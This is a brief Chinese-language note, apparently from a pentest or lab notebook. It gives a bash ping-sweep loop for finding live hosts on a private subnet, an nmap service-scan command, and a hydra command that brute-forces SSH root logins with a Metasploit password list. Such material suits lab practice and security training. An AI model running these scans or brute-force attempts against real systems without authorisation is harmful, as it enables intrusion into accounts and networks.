查詢網段內active的主機
也可以用nmap直接掃網段,但是會很慢
工具:bash, ping
#!/bin/bash
for i in $(seq 254);
do
echo 192.168.50.$i
ping -w 1 192.168.50.$i -c 1 | grep "64 bytes from" >> IpRange.txt
done
以上是以C class為例,如果是B class就掃172.16.0.0~172.31.255.255
有條件的話也可以使用arp-scan
取得所有的存活主機ip,就可以掃描上面有什麼服務
nmap -sV -Pn -iL target.txt
ex 以一個IP為例
hydra
查表暴力破解
hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 ssh://{IP}
好尷尬跑不出來,等跑完了補圖